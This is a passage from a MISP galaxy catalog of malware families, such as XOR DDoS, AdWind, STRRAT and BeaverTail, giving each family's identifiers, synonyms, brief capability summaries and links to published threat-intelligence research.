---|---|
type | [] |
Xbash
Internal MISP references
UUID ee54fc1e-c574-4836-8cdb-992ac38cef32
which can be used as unique global reference for Xbash
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
xdr33
According to 360 netlab, this backdoor was derived from the leaked CIA Hive project. It propagates via a vulnerability in F5 and communicates using SSL with a forged Kaspersky certificate.
Internal MISP references
UUID c7b1cc91-7464-436e-ac40-3b06c98400a5
which can be used as unique global reference for xdr33
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
XOR DDoS
Linux DDoS C&C Malware
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular XOR DDoS.
Known Synonyms |
---|
XORDDOS |
Internal MISP references
UUID 7f9df618-4bd1-44a1-ad88-e5930373aac4
which can be used as unique global reference for XOR DDoS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos - webarchive
- https://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intelligence-groundhog.pdf - webarchive
- https://www.lacework.com/groundhog-botnet-rapidly-infecting-cloud/ - webarchive
- https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/ - webarchive
- https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf - webarchive
- https://www.microsoft.com/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/ - webarchive
- https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html - webarchive
- https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/ - webarchive
- https://en.wikipedia.org/wiki/Xor_DDoS - webarchive
- http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html - webarchive
- https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf - webarchive
- https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775 - webarchive
- https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf - webarchive
- https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/ - webarchive
- https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/ - webarchive
- https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-a-string-array-in-xor-ddos/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Zergeca
Zergeca is a DDoS-botnet and backdoor written in Golang. It uses modified UPX for packing, with the magic number 0x30219101 instead of "UPX!". It is being distributed via weak telnet passwords and known vulnerabilities.
Internal MISP references
UUID a660eeda-910a-4df5-86ba-f17d8ac93c31
which can be used as unique global reference for Zergeca
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ZeroBot
ZeroBot is a Go-based botnet that spreads primarily through IoT and web application vulnerabilities. It is offered as malware as a service (MaaS), and its infrastructure overlaps with DDoS-for-hire services seized by the FBI in December 2022.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ZeroBot.
Known Synonyms |
---|
ZeroStresser |
Internal MISP references
UUID 458c583b-4353-4104-bee8-9e68cb77f151
which can be used as unique global reference for ZeroBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ZHtrap
Internal MISP references
UUID d070ff73-ad14-4f6b-951f-1645009bdf80
which can be used as unique global reference for ZHtrap
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Zollard
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Zollard.
Known Synonyms |
---|
darlloz |
Internal MISP references
UUID 9218630d-0425-4b18-802c-447a9322990d
which can be used as unique global reference for Zollard
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ZuoRAT
According to Black Lotus Labs, ZuoRAT is a MIPS file compiled for SOHO routers that can enumerate a host and internal LAN, capture packets being transmitted over the infected device and perform person-in-the-middle attacks (DNS and HTTPS hijacking based on predefined rules).
Internal MISP references
UUID c4b0a7cd-b349-44a1-94ca-3d5a4ac288b2
which can be used as unique global reference for ZuoRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AutoCAD Downloader
Small downloader composed as a Fast-AutoLoad LISP (FAS) module for AutoCAD.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AutoCAD Downloader.
Known Synonyms |
---|
Acad.Bursted |
Duxfas |
Internal MISP references
UUID fb22d876-c6b5-4634-a468-5857088d605c
which can be used as unique global reference for AutoCAD Downloader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
COOKIESNATCH
According to Google, this is a cookie stealer.
Internal MISP references
UUID 1b2d02d7-aa83-4101-ab10-2767b59c9c75
which can be used as unique global reference for COOKIESNATCH
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DualToy (iOS)
Internal MISP references
UUID f7c1675f-b38a-4511-9ac4-6e475b3815e6
which can be used as unique global reference for DualToy (iOS)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GuiInject
Internal MISP references
UUID d9215579-eee0-4e50-9157-dba7c3214769
which can be used as unique global reference for GuiInject
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
lightSpy
Internal MISP references
UUID 8a1b524b-8fc9-4b1d-805d-c0407aff00d7
which can be used as unique global reference for lightSpy
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ios.lightspy - webarchive
- https://hunt.io/blog/tracking-lightspy-certificates-as-windows-into-adversary-behavior - webarchive
- https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf - webarchive
- https://www.threatfabric.com/blogs/lightspy-mapt-mobile-payment-system-attack - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/ - webarchive
- https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Phenakite
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Phenakite.
Known Synonyms |
---|
Dakkatoni |
Internal MISP references
UUID 7ba7488c-b153-4949-8391-bcf6c4b057bd
which can be used as unique global reference for Phenakite
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PoisonCarp
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PoisonCarp.
Known Synonyms |
---|
INSOMNIA |
Internal MISP references
UUID 7982cc15-f884-40ca-8a82-a452b9c340c7
which can be used as unique global reference for PoisonCarp
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ios.poisoncarp - webarchive
- https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html - webarchive
- https://citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Postlo
Internal MISP references
UUID 25bff9ad-20dc-4746-a174-e54fcdd8f0c1
which can be used as unique global reference for Postlo
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TriangleDB
Internal MISP references
UUID 25754894-018b-4bed-aab6-c676fac23a77
which can be used as unique global reference for TriangleDB
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ios.triangledb - webarchive
- https://media.ccc.de/v/37c3-11859-operation_triangulation_what_you_get_when_attack_iphones_of_researchers - webarchive
- https://securelist.com/operation-triangulation-catching-wild-triangle/110916/ - webarchive
- https://securelist.com/operation-triangulation-the-last-hardware-mystery/111669/ - webarchive
- https://securelist.com/triangulation-validators-modules/110847/ - webarchive
- https://securelist.com/triangledb-triangulation-implant/110050/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
VALIDVICTOR
According to Google, this reconnaissance payload uses a profiling framework drawing canvas to identify the target’s exact iPhone model, a technique used by many other actors. The iPhone model is sent back to the C2 along with screen size, whether or not a touch screen is present, and a unique identifier per initial GET request (e.g., 1lwuzddaxoom5ylli37v90kj). The server replies with either an AES encrypted next stage or 0, indicating that no payload is available for this device. The payload makes another request to the exploit server with gcr=1 as a parameter to get the AES decryption key from the C2.
Internal MISP references
UUID 16c0e484-7d03-46f4-870a-297d5397d693
which can be used as unique global reference for VALIDVICTOR
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WireLurker (iOS)
The iOS malware that is installed over USB by osx.wirelurker.
Internal MISP references
UUID bb340271-023c-4283-9d22-123317824a11
which can be used as unique global reference for WireLurker (iOS)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
X-Agent (iOS)
Internal MISP references
UUID 430b9f30-5e37-49c8-b4e7-21589f120d89
which can be used as unique global reference for X-Agent (iOS)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AdWind
Part of a Malware-as-a-Service platform. Used as a generic name for Java-based RATs.
Functionality:
- collect general system and user information
- terminate processes
- log keystrokes
- take screenshots and access the webcam
- steal cached passwords from local or web forms
- download and execute malware
- modify the registry
- download components
- Denial of Service attacks
- acquire VPN certificates
Initial infection vector:
1. Email with JAR files attached
2. Malspam URL to download the malware
Persistence: Run key - HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Hiding: uses attrib.exe
Notes on Adwind: the malware is not known to be proxy aware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AdWind.
Known Synonyms |
---|
AlienSpy |
Frutas |
JBifrost |
JSocket |
Sockrat |
UNRECOM |
Internal MISP references
UUID 8eb9d4aa-257a-45eb-8c65-95c18500171c
which can be used as unique global reference for AdWind
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind - webarchive
- https://marcoramilli.com/2018/08/20/interesting-hidden-threat-since-years/ - webarchive
- https://dissectingmalware.blogspot.com/2018/08/export-jratadwind-config-with-x32dbg.html - webarchive
- https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html - webarchive
- https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html - webarchive
- https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/ - webarchive
- https://blogs.seqrite.com/evolution-of-jrat-java-malware/ - webarchive
- https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/ - webarchive
- https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885 - webarchive
- https://research.checkpoint.com/malware-against-the-c-monoculture/ - webarchive
- https://www.zscaler.com/blogs/research/compromised-wordpress-sites-used-distribute-adwind-rat - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- http://malware-traffic-analysis.net/2017/07/04/index.html - webarchive
- https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf - webarchive
- https://citizenlab.ca/2015/12/packrat-report/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Adzok
Internal MISP references
UUID 90cb8ee6-52e6-4d8d-8f45-f04b9aec1f6c
which can be used as unique global reference for Adzok
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Banload
F-Secure observed Banload variants silently downloading malicious files from a remote server, then installing and executing the files.
Internal MISP references
UUID 30a61fa9-4bd1-427d-9382-ff7c33bd7043
which can be used as unique global reference for Banload
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/jar.banload - webarchive
- https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanDownloader%3AWin32%2FBanload - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2015/05/CPL-Malware-in-Brasil-zx02m.pdf - webarchive
- https://colin.guru/index.php?title=Advanced_Banload_Analysis - webarchive
- https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Blue Banana RAT
Internal MISP references
UUID c51bbc9b-0906-4ac5-8026-d6b8b7b23e71
which can be used as unique global reference for Blue Banana RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CrossRAT
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CrossRAT.
Known Synonyms |
---|
Trupto |
Internal MISP references
UUID bae3a6c7-9e58-47f2-8749-a194675e1c84
which can be used as unique global reference for CrossRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DynamicRAT
DynamicRAT is a malware that is spread via email attachments and compromises the security of computer systems. Once running on a device, DynamicRAT establishes a persistent presence and gives attackers complete remote control. Its features include sensitive data exfiltration, hardware control, remote action, and the ability to perform DDoS attacks. In addition, DynamicRAT uses evasion and persistence techniques to evade detection and analysis by security solutions.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DynamicRAT.
Known Synonyms |
---|
DYNARAT |
Internal MISP references
UUID 28539c3d-89a4-4dd6-85f5-f4c95808c0b7
which can be used as unique global reference for DynamicRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EpicSplit RAT
EpicSplit RAT is a multiplatform Java RAT that is capable of running shell commands, downloading, uploading, and executing files, manipulating the file system, establishing persistence, taking screenshots, and manipulating keyboard and mouse events. EpicSplit is typically obfuscated with the commercial Allatori Obfuscator software. One unique feature of the malware is that TCP messages sent by EpicSplit RAT to its C2 are terminated with the string "packet" as a packet delimiter.
Internal MISP references
UUID 90b304a2-452a-4c74-ae8d-80d9ace881a4
which can be used as unique global reference for EpicSplit RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FEimea RAT
Internal MISP references
UUID 3724d5d0-860d-4d1e-92a1-0a7089ca2bb3
which can be used as unique global reference for FEimea RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IceRat
According to Karsten Hahn, this malware is actually written in JPHP, but can be treated similarly to .class files produced by Java. IceRat has been observed carrying out information stealing and mining.
Internal MISP references
UUID ac83a481-2ab4-42c2-a8b6-a4aec96e1c4b
which can be used as unique global reference for IceRat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
JavaDispCash
JavaDispCash is a piece of malware designed for ATMs. The compromise happens by using the JVM attach API on the ATM's local application, and the goal is to remotely control its operation. The malware's primary feature is the ability to dispense cash. The malware also opens a local port (65413) listening for commands from the attacker, who needs to be located on the same internal network.
Internal MISP references
UUID 71286008-9794-4dcc-a571-164195390c39
which can be used as unique global reference for JavaDispCash
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
JavaLocker
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular JavaLocker.
Known Synonyms |
---|
JavaEncrypt Ransomware |
Internal MISP references
UUID 4bdddf41-8d5e-468d-905d-8c6667a5d47f
which can be used as unique global reference for JavaLocker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
jRAT
jRAT, also known as Jacksbot, is a RAT with history, written in Java. It supports macOS, Linux, Windows and various BSDs. It also has functionality to participate in DDoS attacks as well as to perform click fraud. Note that the Adwind family is often mistakenly labeled as jRAT because of a red herring reference to jrat.io.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular jRAT.
Known Synonyms |
---|
Jacksbot |
Internal MISP references
UUID f2a9f583-b4dd-4669-8808-49c8bbacc376
which can be used as unique global reference for jRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat - webarchive
- https://www.eff.org/files/2018/01/29/operation-manul.pdf - webarchive
- https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/ - webarchive
- https://research.checkpoint.com/malware-against-the-c-monoculture/ - webarchive
- https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
jSpy
Internal MISP references
UUID ff24997d-1f17-4f00-b9b8-b3392146540f
which can be used as unique global reference for jSpy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mineping
DDoS for Minecraft servers.
Internal MISP references
UUID f3f38528-a8bf-496a-af46-7eb60a9ec6c3
which can be used as unique global reference for Mineping
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Octopus Scanner
Internal MISP references
UUID 8ae996fe-50bb-479b-925c-e6b1e51a9b40
which can be used as unique global reference for Octopus Scanner
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Pronsis Loader
According to TrustWave, this is a loader leveraging JPHP, which was observed fetching Latrodectus and Lumma.
Internal MISP references
UUID 80005653-bfbb-4a37-a8bf-87f8dc9e4047
which can be used as unique global reference for Pronsis Loader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/jar.pronsis_loader - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/russian-espionage-influence-ukrainian-military-recruits-anti-mobilization-narratives?hl=en - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pronsis-loader-a-jphp-driven-malware-diverging-from-d3fck-loader/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Qarallax RAT
According to SpiderLabs, in May 2015 the "company" Quaverse offered a RAT known as Quaverse RAT or QRAT. Around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus Qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT).
Internal MISP references
UUID e7852eb9-9de9-43d3-9f7e-3821f3b2bf41
which can be used as unique global reference for Qarallax RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Qealler
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Qealler.
Known Synonyms |
---|
Pyrogenic Infostealer |
Internal MISP references
UUID d16a3a1f-e244-4715-a67f-61ba30901efb
which can be used as unique global reference for Qealler
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/jar.qealler - webarchive
- https://github.com/jeFF0Falltrades/Malware-Writeups/blob/master/Qealler/Qealler-Unloaded.pdf - webarchive
- https://www.securityinbits.com/malware-analysis/unpacking/unpacking-pyrogenic-qealler-using-java-agent-part-0x2/ - webarchive
- https://www.securityinbits.com/malware-analysis/pyrogenic-infostealer-static-analysis-part-0x1/ - webarchive
- https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer - webarchive
- https://www.cyberark.com/threat-research-blog/qealler-the-silent-java-credential-thief/ - webarchive
- https://www.herbiez.com/?p=1352 - webarchive
- https://www.securityinbits.com/malware-analysis/similarity-between-qealler-pyrogenic-variants-part-0x3/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
QRat
QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QRat.
Known Synonyms |
---|
Quaverse RAT |
Internal MISP references
UUID ef385825-bfa1-4e8c-b368-522db78cf1bd
which can be used as unique global reference for QRat
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat - webarchive
- https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rats-and-spam-the-nodejs-qrat/ - webarchive
- https://www.digitrustgroup.com/java-rat-qrat/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/updated-qnode-rat-downloader-distributed-as-trump-video-scandal/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ratty
Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist.
Internal MISP references
UUID da032a95-b02a-4af2-b563-69f686653af4
which can be used as unique global reference for Ratty
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty - webarchive
- https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/ - webarchive
- https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sorillus RAT
Sorillus is a Java-based multifunctional remote access trojan (RAT) which targets Linux, macOS and Windows operating systems. While it was first created in 2019, interest in the tool has increased considerably in 2022. Beginning on January 18, 2022, different obfuscated client versions of the tool started to be uploaded to VirusTotal. Sorillus' features are described in detail on its website (hxxps://sorillus[.]com). The tool supposedly costs 49.99€ for lifetime access but is currently available at a discounted 19.99€. Conveniently, Sorillus can be purchased via a variety of cryptocurrencies. The tool's creator and distributor, a YouTube user known as "Tapt", asserts that the tool is able to collect the following information from its target:
- HardwareID
- Username
- Country
- Language
- Webcam
- Headless
- Operating system
- Client Version
Internal MISP references
UUID 80694785-aeb6-4e05-a3e8-cb972993d769
which can be used as unique global reference for Sorillus RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
STRRAT
STRRAT is a Java-based RAT, which makes extensive use of plugins to provide full remote access to an attacker, as well as credential stealing, key logging and additional plugins. The RAT has a focus on stealing credentials of browsers and email clients, and passwords via keylogging. It supports the following browsers and email clients: Firefox, Internet Explorer, Chrome, Foxmail, Outlook, Thunderbird.
From version 1.2 onward, STRRAT was infamous for its ransomware-like behavior of appending the file name extension .crimson to files. Version 1.5 is notably more obfuscated and modular than previous versions, but the backdoor functions mostly remain the same: collect browser passwords, run remote commands and PowerShell, log keystrokes, among others. Version 1.5 of STRRAT includes a proper encryption routine, though it is currently fairly simple to reverse.
Internal MISP references
UUID 6d1335d5-8351-4725-ad8a-07cabca4119e
which can be used as unique global reference for STRRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/jar.strrat - webarchive
- https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf - webarchive
- https://forensicitguy.github.io/strrat-attached-to-msi/ - webarchive
- https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-strrat-zloader-honeygain - webarchive
- https://any.run/cybersecurity-blog/strrat-malware-analysis-of-a-jar-archive/ - webarchive
- https://twitter.com/MsftSecIntel/status/1395138347601854465 - webarchive
- https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/ - webarchive
- https://www.jaiminton.com/reverse-engineering/strrat - webarchive
- https://resources.securityscorecard.com/cybersecurity/analyze-java-malware-strrat#page=1 - webarchive
- https://isc.sans.edu/diary/rss/27798 - webarchive
- https://www.gdatasoftware.com/blog/strrat-crimson - webarchive
- https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries - webarchive
- https://www.jaiminton.com/reverse-engineering/strrat# - webarchive
- https://www.fortinet.com/blog/threat-research/vcurms-a-simple-and-functional-weapon - webarchive
- https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape - webarchive
- https://www.fortinet.com/blog/threat-research/new-strrat-rat-phishing-campaign - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SupremeBot
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SupremeBot.
Known Synonyms |
---|
BlazeBot |
Internal MISP references
UUID 651e37e0-1bf8-4024-ac1e-e7bda42470b0
which can be used as unique global reference for SupremeBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Verblecon
This malware seems to be used in attacks installing cryptocurrency miners on infected machines. Other indicators lead to the assumption that attackers may also use this malware for other purposes (e.g. stealing access tokens for the Discord chat app). Symantec describes this malware as complex and powerful: the malware is loaded as a server-side polymorphic JAR file.
Internal MISP references
UUID 793565b4-666b-47a4-b15b-de9c80c75a51
which can be used as unique global reference for Verblecon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
VersaMem
According to Lumen, a web shell used by Volt Typhoon.
Internal MISP references
UUID eb15c0ec-108e-4082-a0c1-ea41345b7db7
which can be used as unique global reference for VersaMem
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AIRBREAK
AIRBREAK is a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AIRBREAK.
Known Synonyms |
---|
Orz |
Internal MISP references
UUID fd419da6-5c0d-461e-96ee-64397efac63b
which can be used as unique global reference for AIRBREAK
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak - webarchive
- https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html - webarchive
- http://www.kahusecurity.com/posts/reflow_javascript_backdoor.html - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-mohawk - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bateleur
Internal MISP references
UUID fb75a753-24ba-4b58-b7ed-2e39b0c68c65
which can be used as unique global reference for Bateleur
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/ - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-niagara - webarchive
- https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BeaverTail
BeaverTail is a JavaScript malware primarily distributed through NPM packages. It is designed for information theft and to load further stages of malware, specifically a multi-stage Python-based backdoor known as InvisibleFerret. BeaverTail targets cryptocurrency wallets and credit card information stored in the victim's web browsers. Its code is heavily obfuscated to evade detection. Threat actors can either upload malicious NPM packages containing BeaverTail to GitHub or inject BeaverTail code into legitimate NPM projects. Researchers have identified additional Windows and macOS variants, indicating that the BeaverTail malware family is likely still under development.
Internal MISP references
UUID da0fb7ce-d730-4ee8-bcc8-3da7eba8ad79
which can be used as unique global reference for BeaverTail
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.beavertail - webarchive
- https://www.securonix.com/blog/research-update-threat-actors-behind-the-devpopper-campaign-have-retooled-and-are-continuing-to-target-software-developers-via-social-engineering/ - webarchive
- https://security.macnica.co.jp/blog/2024/10/-contagious-interview.html - webarchive
- https://stacklok.com/blog/dependency-hijacking-dissecting-north-koreas-new-wave-of-defi-themed-open-source-attacks-targeting-developers - webarchive
- https://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/ - webarchive
- https://mp.weixin.qq.com/s/84lUaNSGo4lhQlpnCVUHfQ - webarchive
- https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/ - webarchive
- https://www.zscaler.com/blogs/security-research/pyongyang-your-payroll-rise-north-korean-remote-workers-west - webarchive
- https://securitylabs.datadoghq.com/articles/tenacious-pungsan-dprk-threat-actor-contagious-interview/ - webarchive
- https://www.group-ib.com/blog/apt-lazarus-python-scripts/ - webarchive
